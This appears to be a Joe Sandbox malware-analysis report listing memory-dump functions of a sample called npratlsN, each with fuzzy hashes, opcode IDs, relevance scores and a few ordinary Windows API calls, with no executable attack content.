Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae2fe5463ef238f133cce3e73962d1b03876d856d9724282cc5eb0c4b43d723
Instruction ID: 7e58cf9cc5c6c06ba0d32b83b605a038076fce37574c76ce86889d589af7812b
Opcode Fuzzy Hash: 5ae2fe5463ef238f133cce3e73962d1b03876d856d9724282cc5eb0c4b43d723
Instruction Fuzzy Hash: A3D1AF74E00228CFDB14DFA5C994B9DBBB2BF89340F6081A9D509AB3A4DB355E85CF50

Function 209D7AF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26af37d2d4260d1e42321a06b81439513ad88db5291c5c7c2acfbe1ba38f5338
Instruction ID: f4b901bed8edfc2d56a347d010c39b8b49b2500ca5e384ad54484b5d08d2d7d7
Opcode Fuzzy Hash: 26af37d2d4260d1e42321a06b81439513ad88db5291c5c7c2acfbe1ba38f5338
Instruction Fuzzy Hash: 3BD1B0B4E00228CFDB15DFA9C994B9DBBB2BF89300F1084A9D909AB354DB355D85CF51

Function 209DE7B0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab23079e2a196896a02058ee3205a45009d85f94221da97a2a6a5ca26ac2ea25
Instruction ID: cb6d758876090669e97186a7f1a664a186a47ab562011986a2c57da83c954a98
Opcode Fuzzy Hash: ab23079e2a196896a02058ee3205a45009d85f94221da97a2a6a5ca26ac2ea25
Instruction Fuzzy Hash: 43D1BFB4E00228CFDB15DFA9C984BADBBB2BF89300F2080A9D509AB355DB355D85DF51

Function 209CB580 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829e2d921de9092546fc576b7be601fd4c06899dfd9d3259d56773ec357efe4c
Instruction ID: fcc0971bff83d24bbc17b3a69f16fbed8142a153b8879eada10664177ff9c454
Opcode Fuzzy Hash: 829e2d921de9092546fc576b7be601fd4c06899dfd9d3259d56773ec357efe4c
Instruction Fuzzy Hash: AEC1D174E00228CFDB14DFA5C984B9DBBB2BF89304F2081A9D809AB395DB355E85CF51

Function 209C0E38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec569ac2d4e803841f7bc337bd7f531a8ea2737eb0828c7087fb0ba7936f38d7
Instruction ID: 5610cd1257aba364419896149e35afd536a2dcc93925e1b8d77a4a068c2f2701
Opcode Fuzzy Hash: ec569ac2d4e803841f7bc337bd7f531a8ea2737eb0828c7087fb0ba7936f38d7
Instruction Fuzzy Hash: 8EC1B174E00228CFDB15DFA5C994B9DBBB2BF89301F2081A9D809AB395DB355E85CF14

Function 209CCF90 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2639d962873c5806e43133784d54da0204852c4a820375693d6baef3ee4357
Instruction ID: 89ea5e2eb996df7f4f07218b0e25cffff81b78f5b737dc82648f20199fb04698
Opcode Fuzzy Hash: 3c2639d962873c5806e43133784d54da0204852c4a820375693d6baef3ee4357
Instruction Fuzzy Hash: E3C1E374E01218CFDB15DFA9C984B9DBBB2BF89300F2080A9D409AB394DB359E85CF11

Function 209D0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d826c46aeb2ddf5b05348029c3b000773619781aba114b58a16901d5e5e234
Instruction ID: 4e2568d2c19840e2015bdd57f9d82e82655de20517290b6c5aa016594841721b
Opcode Fuzzy Hash: 70d826c46aeb2ddf5b05348029c3b000773619781aba114b58a16901d5e5e234
Instruction Fuzzy Hash: 53C1B074E00228CFDB15DFA5C994B9DBBB2BF89301F2081A9D409AB395DB359E85CF50

Function 209C1440 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48825f7f55eb8b31e55b58acfc9c5b63e601b336a36cf8cc79f57101ae4fc7bf
Instruction ID: f4bb8c4d8bfdbdddbac298cd6c800c7ef958034d3c0332a3791d1d4da2dd27d0
Opcode Fuzzy Hash: 48825f7f55eb8b31e55b58acfc9c5b63e601b336a36cf8cc79f57101ae4fc7bf
Instruction Fuzzy Hash: 64A134B0E00208CFDB10DFA9C994BDDBBB1FF89310F209269E409AB291DB759985CF55

Function 209C1431 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba87fbe290269cddaf166b3f6aa01d03da81159cc67b43ecfd49b7c6172bf7ab
Instruction ID: 81793690fa764a585e85ac762b141b4d0ecd0304fc858804bc6c66a7e4496e9c
Opcode Fuzzy Hash: ba87fbe290269cddaf166b3f6aa01d03da81159cc67b43ecfd49b7c6172bf7ab
Instruction Fuzzy Hash: 07A145B0E00218CFDB10DFA9C994BDDBBB1FF89310F208269E409AB291DB759984CF55

Function 209D8020 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e52d1ea1975a009b15b395f3a7c9705da494e6ee396843ceb124fa29b5d042b
Instruction ID: a008573dfee17a2c06f6c94fac578520b43b897f3927e1452d104cf24720f86c
Opcode Fuzzy Hash: 0e52d1ea1975a009b15b395f3a7c9705da494e6ee396843ceb124fa29b5d042b
Instruction Fuzzy Hash: 42810375E012189FDB04DFE9D990A9EBBF2BF88310F10C469E819AB755DA309946CF60

Function 209C178B Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 161d424ed9519de21d6f58837fd10e4fd2f7bc24e4cbc2653ad16dd9f8f66660
Instruction ID: c7436fc55ff187da269c81d879bca009a4c839c44754b22bc55848fbecbb9d2a
Opcode Fuzzy Hash: 161d424ed9519de21d6f58837fd10e4fd2f7bc24e4cbc2653ad16dd9f8f66660
Instruction Fuzzy Hash: AE910774D00218CFDB10DFA8C994BDCBBB1FF89314F2092A9E409AB291DB759985CF55

Function 20A86120 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fdbe90679fd80fb53b9e2b113f3d5d5144076aff814c277787172d7787d38b0
Instruction ID: 3d9102d4dd505bb13d99dd4392c24164bb0351eb17d12b74ec7d4952731625fb
Opcode Fuzzy Hash: 6fdbe90679fd80fb53b9e2b113f3d5d5144076aff814c277787172d7787d38b0
Instruction Fuzzy Hash: 9D81BF74E00218CFDB04DFE9C980B9DBBB2BF88340F608569E409AB394DB355986DF50

Function 20A7E810 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d08574c491f029c0c2b0ab15c5d0c3cf05252e8dd2f744e7081d1662f2c344
Instruction ID: 07908a120b6131ba5b436a9dc79678f7fc797dc9eb2b49beb6856505cc04621c
Opcode Fuzzy Hash: c6d08574c491f029c0c2b0ab15c5d0c3cf05252e8dd2f744e7081d1662f2c344
Instruction Fuzzy Hash: 3A81BF74E00218CFDB14DFE9C980BADBBB2BF88341F608569E405AB394DB355986DF50

Function 20A7EB30 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd4da561ad0f657b9cba9ca79e33faa6cf6672bfb93189051350d18c7d3239c
Instruction ID: 770e02c93fd390c50bffff3f8c74876d4e38a8f6b75fe98f697074efeba2d3e3
Opcode Fuzzy Hash: 8bd4da561ad0f657b9cba9ca79e33faa6cf6672bfb93189051350d18c7d3239c
Instruction Fuzzy Hash: A581B074E00218CFDB14DFE9C980B9DBBB2BF88340F608569E409AB394DB355985DF54

Function 20A77150 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b65a73eae77902092d221ea2c6245f38616bffa300a1b80dd767adac6ab675
Instruction ID: 55e7ca6984986b7fc238d28c2548fa6c3857bd490598f671096a9057e00afd21
Opcode Fuzzy Hash: 15b65a73eae77902092d221ea2c6245f38616bffa300a1b80dd767adac6ab675
Instruction Fuzzy Hash: F981BF74E00218CFDB14DFE9C980BADBBB2BF88340F608569E409AB394DB355986DF50

Function 20A44E98 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c942bedbb5f908762d1de05a7a04c81cada73e841a861db6278fe310333f085d
Instruction ID: 846151fd7c4b8b8798644024da005059966b79e536b78a30a515dadb6a0fa354
Opcode Fuzzy Hash: c942bedbb5f908762d1de05a7a04c81cada73e841a861db6278fe310333f085d
Instruction Fuzzy Hash: E751AC71D682A88FDB09DFBAC49428EBFF2BF9A310F54C0A9C0046B256DA700906DF51

Function 20A44EB6 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb878dc18ef2516c893fd630965bf1cc0a3b663988d652696e11f3d5652952d1
Instruction ID: 42297a02de9decf3f0f474c852bf5a27905fedbdc6d12786a11f74006edbe595
Opcode Fuzzy Hash: fb878dc18ef2516c893fd630965bf1cc0a3b663988d652696e11f3d5652952d1
Instruction Fuzzy Hash: 7F51B831D686688FCB09DFBAC89428EBFF2BF99300F54C069C004AB252DB701906CF41

Function 1F90D490 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fdb28b20dd4fbb4b6db378d6dafdfd747334f1cdf0f86e928508b747fb5ad2
Instruction ID: 83e9abe50c949e0c69f6eb98f4553d2eb11efb0eed0e4e111ed958d398864ece
Opcode Fuzzy Hash: a4fdb28b20dd4fbb4b6db378d6dafdfd747334f1cdf0f86e928508b747fb5ad2
Instruction Fuzzy Hash: 5A51A674E00208DFDB19DFEAD594A9DBBB6FF89300F20902AE919AB364DB305841CF54

Function 1F90D481 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc3a8fca1d603694f1088d250677c2798f4ccdcd0b42e59ffd52dc5125784f8
Instruction ID: ad876f03e6ab20d1c32837a8252882887da59efbb04dcfebb4dfb6c6969b841e
Opcode Fuzzy Hash: acc3a8fca1d603694f1088d250677c2798f4ccdcd0b42e59ffd52dc5125784f8
Instruction Fuzzy Hash: FC51D874E00218DFDB19DFB6D594A9DBBB2FF89300F20906AE915AB3A4DB345841CF10

Function 20A448FC Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c6714225686b2d9ee2bb2ef06369f2b3873dbdb428c0bb927622429bcc2e428
Instruction ID: 9e4cb32b3a2cc39c5af11a82175ee6322a7cad6389381ecfca3676f2334f11cb
Opcode Fuzzy Hash: 2c6714225686b2d9ee2bb2ef06369f2b3873dbdb428c0bb927622429bcc2e428
Instruction Fuzzy Hash: CB41D1B4D012188BEB18DFAAC9447DEBBF2BF89304F20C069D418BB295DB355986CF54

Function 209D65B0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ede82318aefdb5a74d28afc091adfc718cd8280321fdbca70be3ddc0e3654a0
Instruction ID: 7dcd8bbbc5133c8da8fd0b2b0fda448218cb08f46ee81b6d1449a88ec65797d1
Opcode Fuzzy Hash: 2ede82318aefdb5a74d28afc091adfc718cd8280321fdbca70be3ddc0e3654a0
Instruction Fuzzy Hash: 3D41D3B5D002088BEB18DFAAD9447DEBBF2BF89304F10D069D419BB294DB355945CF64

Function 209DE7A3 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa2b1756378f0c946516ee0feec8d151296f0c14505a5dd69696c46cae9dc9d7
Instruction ID: ba32ca7d62aeffaeba0fbea5eed0473788b04554aed28bfa6fd62e0e600ea3d7
Opcode Fuzzy Hash: aa2b1756378f0c946516ee0feec8d151296f0c14505a5dd69696c46cae9dc9d7
Instruction Fuzzy Hash: 6141E475E012088BEB08DFEAC9807DEBBF2AF89304F20C469D409BB254EB345946CF10

Function 209D0D38 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2010e7570dd2a37b4da13825714a653cbeb05f2e42b331dd2d7e74711ca8d3
Instruction ID: 4a67843291bb68f13ee7ff873062e8065ed547b205561fd298f0f48b6117a929
Opcode Fuzzy Hash: 2c2010e7570dd2a37b4da13825714a653cbeb05f2e42b331dd2d7e74711ca8d3
Instruction Fuzzy Hash: BB4112B1E042488BDB08DFEAD9407DEBBF2AF89300F20C129D415AB2A5DB344946CF10

Function 20A709BF Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd85565e9ad9148a317a80d92a3e508930b22459dc710441071308286a326f87
Instruction ID: 453db6ddd9fa7ba65b8b10f814bad9d0c11214fad32b7a3df2f23b9ee76c5078
Opcode Fuzzy Hash: fd85565e9ad9148a317a80d92a3e508930b22459dc710441071308286a326f87
Instruction Fuzzy Hash: 7D41C6B1E00218CBDB18CFAAD9457DEBBF2BF89300F10D469D418AB264DB345946CF54

Function 209D7AED Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f129063afb510b0f655456970e3b215afea7bf12ac2278475b6780473710c712
Instruction ID: c04c5e1bd343d38e5a8373b01223a922a3c4fbed25e770fab404dd84fd41e79d
Opcode Fuzzy Hash: f129063afb510b0f655456970e3b215afea7bf12ac2278475b6780473710c712
Instruction Fuzzy Hash: 9D41D471E012188BEB18DFEAD9907DEFBF2AF89300F20D429D409AB254EB354945CF50

Function 20A7E808 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db903e706b4fc4539fd6cd2d2f6f518a047bed90a73123626f72478a4e2802eb
Instruction ID: 75acf9864d1f19b370a8e8ff0eae1e085159ed3e13f1a9109fb5c9311216e156
Opcode Fuzzy Hash: db903e706b4fc4539fd6cd2d2f6f518a047bed90a73123626f72478a4e2802eb
Instruction Fuzzy Hash: D031BF74E012188BDB08CFEAD9446DEBBF2BF89300F60D42AD418AB264EB345906CF55

Function 1F906581 Relevance: 10.5, Strings: 8, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(osq, xrefs: 1F906742
(osq, xrefs: 1F9066A5
,wq, xrefs: 1F906A30
,wq, xrefs: 1F906A20
(osq, xrefs: 1F906A8F
(osq, xrefs: 1F906679
(osq, xrefs: 1F9065BE
(osq, xrefs: 1F906A9F

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$(osq$(osq$(osq$,wq$,wq
API String ID: 0-1935560061
Opcode ID: dea19d35ed1f89077614143718c2bbf6b779fe816eb9ea222536e94f4712ff6b
Instruction ID: 7bafd32487fb15119b54584697d561c2ba74213b23e4e667d84f56361cc075fd
Opcode Fuzzy Hash: dea19d35ed1f89077614143718c2bbf6b779fe816eb9ea222536e94f4712ff6b
Instruction Fuzzy Hash: 66125F70A00249DFCB15EF68C894A9EBBF9BF48314F218569E9559B2A1DB30FD41CB90

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 20BEB860 Relevance: 6.1, APIs: 4, Instructions: 141
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 20BEB8EE
GetCurrentThread.KERNEL32 ref: 20BEB92B
GetCurrentProcess.KERNEL32 ref: 20BEB968
GetCurrentThreadId.KERNEL32 ref: 20BEB9C1

Memory Dump Source

Source File: 0000000D.00000002.3864714448.0000000020BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20be0000_npratlsN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4622df0eaefd2fdff9ce9b4d9f54e1485ae025e5fe7890fe4e0f00e458cad56f
Instruction ID: 2db07da67f4d54e2e5a12946db9893f89c6d7fb86eab80a76cc18593934aa3bd
Opcode Fuzzy Hash: 4622df0eaefd2fdff9ce9b4d9f54e1485ae025e5fe7890fe4e0f00e458cad56f
Instruction Fuzzy Hash: CF5199B0900749CFDB24CFAAD988B9EBBF1EF88310F20845AD509A7361DB746944CB65

Function 20BEB870 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 20BEB8EE
GetCurrentThread.KERNEL32 ref: 20BEB92B
GetCurrentProcess.KERNEL32 ref: 20BEB968
GetCurrentThreadId.KERNEL32 ref: 20BEB9C1

Memory Dump Source

Source File: 0000000D.00000002.3864714448.0000000020BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20be0000_npratlsN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2cea9ac082aac42c0befcddf37e665ea2e5fe3d5e1b3f9d3e44d21b641c2ec8a
Instruction ID: 46245899ae21efc3f1af255cad11717852fe79a1dec25a11138f46f680c325b1
Opcode Fuzzy Hash: 2cea9ac082aac42c0befcddf37e665ea2e5fe3d5e1b3f9d3e44d21b641c2ec8a
Instruction Fuzzy Hash: F65147B0900749CFDB24CFAAD988B9EBBF1EF88310F208559E509A7361DB756940CF65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 1F901C54 Relevance: 5.4, Strings: 4, Instructions: 409COMMON

Download Yara Rule

Strings

Xwq, xrefs: 1F901DBF
Xwq, xrefs: 1F901D06
Xwq, xrefs: 1F901E0C
Xwq, xrefs: 1F901D40

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: Xwq$Xwq$Xwq$Xwq
API String ID: 0-1964751375
Opcode ID: 5a2d8da7a9405cdab7932b96b59e98d40f2f58ba82cba1dba9e0c2d81a30060c
Instruction ID: 41fedaa501b0d1ca39ac11361154531b6152fe282e95ac492b4f062338cffb11
Opcode Fuzzy Hash: 5a2d8da7a9405cdab7932b96b59e98d40f2f58ba82cba1dba9e0c2d81a30060c
Instruction Fuzzy Hash: F2D15B3A98E3BD4ECF16FB7598872D9BF24AF49320F0825EDC4496F591DA7074888B50

Function 1F907F18 Relevance: 4.2, Strings: 3, Instructions: 496COMMON

Download Yara Rule

Strings

;sq, xrefs: 1F90835C
4'sq, xrefs: 1F907F67
4'sq, xrefs: 1F907F41

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 4'sq$4'sq$;sq
API String ID: 0-111817264
Opcode ID: 75ef8e3d4c5fb8938c57bfb4c85f015178c497b8ea25f4183844bf30e1b05c3b
Instruction ID: bad0813f33de4913a7496130c194cd851d3d79686346abc40fc6931e300ae796
Opcode Fuzzy Hash: 75ef8e3d4c5fb8938c57bfb4c85f015178c497b8ea25f4183844bf30e1b05c3b
Instruction Fuzzy Hash: 32F19D303046128FDB16FB39C954B6D7AAEAF94750F1544AEE501CF3E2EA69EC41C781

Function 1F904DB0 Relevance: 2.8, Strings: 2, Instructions: 337COMMON

Download Yara Rule

Strings

Hwq, xrefs: 1F904E9B
Hwq, xrefs: 1F904ECE

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: Hwq$Hwq
API String ID: 0-741242263
